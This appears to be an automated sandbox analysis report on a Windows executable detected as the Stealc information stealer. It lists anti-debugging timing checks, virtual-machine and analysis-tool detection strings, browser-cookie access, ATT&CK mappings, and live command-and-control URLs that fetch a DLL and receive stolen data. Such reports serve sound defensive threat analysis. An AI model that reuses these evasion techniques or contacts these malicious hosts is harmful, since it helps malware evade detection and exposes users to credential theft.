Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B6A45 second address: 7B6A49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9DEE second address: 7B9E0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F3Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F56ACB76F38h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9E0B second address: 7B9E14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9E14 second address: 7B9E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9E1D second address: 7B9E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C18C4 second address: 7C18CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C18CA second address: 7C190F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F56AD341B16h 0x0000000a jbe 00007F56AD341B16h 0x00000010 popad 0x00000011 jo 00007F56AD341B28h 0x00000017 jmp 00007F56AD341B1Ch 0x0000001c js 00007F56AD341B16h 0x00000022 pushad 0x00000023 jmp 00007F56AD341B29h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C190F second address: 7C1915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C1915 second address: 7C1927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jl 00007F56AD341B16h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C1927 second address: 7C1933 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F56ACB76F36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C1933 second address: 7C1947 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B1Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C1947 second address: 7C194B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C194B second address: 7C194F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C194F second address: 7C1955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D35D2 second address: 7D35DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F56AD341B18h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D35DF second address: 7D35E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D3125 second address: 7D3129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D3129 second address: 7D312D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D32A8 second address: 7D32AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D32AC second address: 7D32B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D32B2 second address: 7D32B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D32B8 second address: 7D32D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F56ACB76F42h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E3C8B second address: 7E3C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E3C91 second address: 7E3C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E3C96 second address: 7E3CA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F56AD341B16h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E2FDA second address: 7E300E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56ACB76F44h 0x00000009 popad 0x0000000a jmp 00007F56ACB76F3Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F56ACB76F3Fh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E3431 second address: 7E3451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56AD341B26h 0x00000009 pop ebx 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E3451 second address: 7E3459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E35B0 second address: 7E35BE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F56AD341B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E3862 second address: 7E3866 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E3866 second address: 7E386F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E386F second address: 7E3878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E3878 second address: 7E387C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E54F5 second address: 7E5501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F56ACB76F3Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E5356 second address: 7E5362 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F56AD341B16h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E5362 second address: 7E5394 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F47h 0x00000007 jmp 00007F56ACB76F3Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007F56ACB76F5Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E5394 second address: 7E53AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ECB9E second address: 7ECBA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5170425 second address: 517042B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 517042B second address: 517042F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 517042F second address: 517047C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F56AD341B25h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movsx ebx, ax 0x00000016 pushfd 0x00000017 jmp 00007F56AD341B24h 0x0000001c xor cx, BA08h 0x00000021 jmp 00007F56AD341B1Bh 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5170575 second address: 517058D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F56ACB76F44h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7118C2 second address: 7118C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7118C8 second address: 7118CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7118CC second address: 7118D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 711A88 second address: 711A96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 563BF1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 709B3A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 708DF4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 78CF92 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Window / User API: threadDelayed 1631

Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 2792	Thread sleep count: 56 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2792	Thread sleep time: -112056s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6604	Thread sleep count: 51 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6604	Thread sleep time: -102051s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1672	Thread sleep count: 50 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1672	Thread sleep time: -100050s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5852	Thread sleep count: 1631 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5852	Thread sleep time: -3263631s >= -30000s	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.2800810220.00000000006E5000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000002.2801350861.000000000119E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware:
Source: file.exe, 00000000.00000002.2801350861.00000000011E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWHQ!
Source: file.exe, 00000000.00000002.2801350861.0000000001212000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: file.exe, 00000000.00000002.2801350861.000000000119E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe, 00000000.00000002.2800810220.00000000006E5000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 3424, type: MEMORYSTR

Source: file.exe, file.exe, 00000000.00000002.2800810220.00000000006E5000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: :Program Manager

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2800489909.000000000038A000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2801350861.000000000119E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3424, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 3424, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2800489909.000000000038A000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2801350861.000000000119E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3424, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	2 Process Injection	1 Masquerading	1 OS Credential Dumping	641 Security Software Discovery	Remote Services	1 Data from Local System	11 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	24 Virtualization/Sandbox Evasion	LSASS Memory	24 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	112 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	222 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	42%	Virustotal		Browse
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://185.215.113.100/e2b1563c6670f193.php	100%	URL Reputation	malware
http://185.215.113.100/0d60be0de163924d/sqlite3.dll	100%	URL Reputation	malware
http://185.215.113.100	100%	URL Reputation	malware
http://upx.sf.net	0%	URL Reputation	safe
http://185.215.113.100/	100%	URL Reputation	malware
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
http://185.215.113.100/e2b1563c6670f193.phpUser	16%	Virustotal		Browse
http://185.215.113.1000d60be0de163924d/sqlite3.dllY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZG	0%	Avira URL Cloud	safe
http://185.215.113.100/e2b1563c6670f193.phpion:	6%	Virustotal		Browse
http://185.215.113.100/e2b1563c6670f193.phpWm	100%	Avira URL Cloud	malware
http://185.215.113.100/0d60be0de163924d/sqlite3.dllq	19%	Virustotal		Browse
http://185.215.113.100/0d60be0de163924d/sqlite3.dllq	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpUser	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpion:	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZ	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpx	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpinit.exe	100%	Avira URL Cloud	malware
http://185.215.113.100GIJ	0%	Avira URL Cloud	safe
http://185.215.113.100:	0%	Avira URL Cloud	safe
http://185.215.113.100/e2b1563c6670f193.php7mH	100%	Avira URL Cloud	malware
http://185.215.113.100s.exe	0%	Avira URL Cloud	safe
http://185.215.113.100/e2b1563c6670f193.phpZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZ	16%	Virustotal		Browse
http://185.215.113.100/0d60be0de163924d/sqlite3.dllc	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpinit.exe	18%	Virustotal		Browse
http://185.215.113.100/e2b1563c6670f193.phpx	12%	Virustotal		Browse
http://185.215.113.100/0d60be0de163924d/sqlite3.dllc	19%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.100/e2b1563c6670f193.php	true	URL Reputation: malware	unknown
http://185.215.113.100/0d60be0de163924d/sqlite3.dll	true	URL Reputation: malware	unknown
http://185.215.113.100/	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.100/e2b1563c6670f193.phpUser	file.exe, 00000000.00000002.2800489909.00000000004CD000.00000040.00000001.01000000.00000003.sdmp	true	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.1000d60be0de163924d/sqlite3.dllY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZG	file.exe, 00000000.00000002.2800489909.00000000004CD000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: safe	unknown
http://185.215.113.100/e2b1563c6670f193.phpion:	file.exe, 00000000.00000002.2800489909.00000000004CD000.00000040.00000001.01000000.00000003.sdmp	true	6%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.100	file.exe, 00000000.00000002.2800489909.00000000004CD000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2801350861.000000000119E000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://185.215.113.100/0d60be0de163924d/sqlite3.dllq	file.exe, 00000000.00000002.2801350861.00000000011F6000.00000004.00000020.00020000.00000000.sdmp	true	19%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.phpWm	file.exe, 00000000.00000002.2801350861.00000000011F6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
